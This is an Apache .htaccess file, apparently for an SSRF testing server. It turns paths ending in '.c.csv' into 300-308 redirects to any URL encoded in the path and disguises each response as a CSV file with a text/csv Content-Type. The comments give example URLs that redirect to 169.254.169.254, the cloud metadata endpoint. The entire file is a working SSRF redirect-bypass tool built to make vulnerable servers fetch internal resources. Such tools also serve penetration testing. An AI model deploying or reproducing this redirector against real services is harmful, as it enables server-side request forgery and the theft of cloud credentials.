# Set csv response body
ErrorDocument 300 "Device Name,Platform,OS"
ErrorDocument 301 "Device Name,Platform,OS"
ErrorDocument 302 "Device Name,Platform,OS"
ErrorDocument 303 "Device Name,Platform,OS"
ErrorDocument 305 "Device Name,Platform,OS"
ErrorDocument 307 "Device Name,Platform,OS"
ErrorDocument 308 "Device Name,Platform,OS"

# 300 with response body
# https://ssrf.localdomain.pw/csv-with-body/300-http-169.254.169.254:80-.c.csv
# https://ssrf.localdomain.pw/csv-with-body/300-http-169.254.169.254:80-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 300-([^/-]*)-([^/-]*)-(.*).c.csv$
RewriteRule 300-([^/-]*)-([^/-]*)-(.*).c.csv$ $1://$2/$3 [L,R=300,NC]

# 301 with response body
# https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv
# https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 301-([^/-]*)-([^/-]*)-(.*).c.csv$
RewriteRule 301-([^/-]*)-([^/-]*)-(.*).c.csv$ $1://$2/$3 [L,R=301,NC]

# 302 with response body
# https://ssrf.localdomain.pw/csv-with-body/302-http-169.254.169.254:80-.c.csv
# https://ssrf.localdomain.pw/csv-with-body/302-http-169.254.169.254:80-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 302-([^/-]*)-([^/-]*)-(.*).c.csv$
RewriteRule 302-([^/-]*)-([^/-]*)-(.*).c.csv$ $1://$2/$3 [L,R=302,NC]

# 303 with response body
# https://ssrf.localdomain.pw/csv-with-body/303-http-169.254.169.254:80-.c.csv
# https://ssrf.localdomain.pw/csv-with-body/303-http-169.254.169.254:80-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 303-([^/-]*)-([^/-]*)-(.*).c.csv$
RewriteRule 303-([^/-]*)-([^/-]*)-(.*).c.csv$ $1://$2/$3 [L,R=303,NC]

# 305 with response body
# https://ssrf.localdomain.pw/csv-with-body/305-http-169.254.169.254:80-.c.csv
# https://ssrf.localdomain.pw/csv-with-body/305-http-169.254.169.254:80-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 305-([^/-]*)-([^/-]*)-(.*).c.csv$
RewriteRule 305-([^/-]*)-([^/-]*)-(.*).c.csv$ $1://$2/$3 [L,R=305,NC]

# 307 with response body
# https://ssrf.localdomain.pw/csv-with-body/307-http-169.254.169.254:80-.c.csv
# https://ssrf.localdomain.pw/csv-with-body/307-http-169.254.169.254:80-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 307-([^/-]*)-([^/-]*)-(.*).c.csv$
RewriteRule 307-([^/-]*)-([^/-]*)-(.*).c.csv$ $1://$2/$3 [L,R=307,NC]

# 308 with response body
# https://ssrf.localdomain.pw/csv-with-body/308-http-169.254.169.254:80-.c.csv
# https://ssrf.localdomain.pw/csv-with-body/308-http-169.254.169.254:80-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 308-([^/-]*)-([^/-]*)-(.*).c.csv$
RewriteRule 308-([^/-]*)-([^/-]*)-(.*).c.csv$ $1://$2/$3 [L,R=308,NC]

# Always set the Content-Type header text/csv
Header always set Content-Type text/csv
# Always set Cache-Control to max-age=0, must-revalidate, no-cache, no-store, private
Header always set Cache-Control "max-age=0, must-revalidate, no-cache, no-store, private"
# Always set Pragma to no-cache
Header always set Pragma no-cache
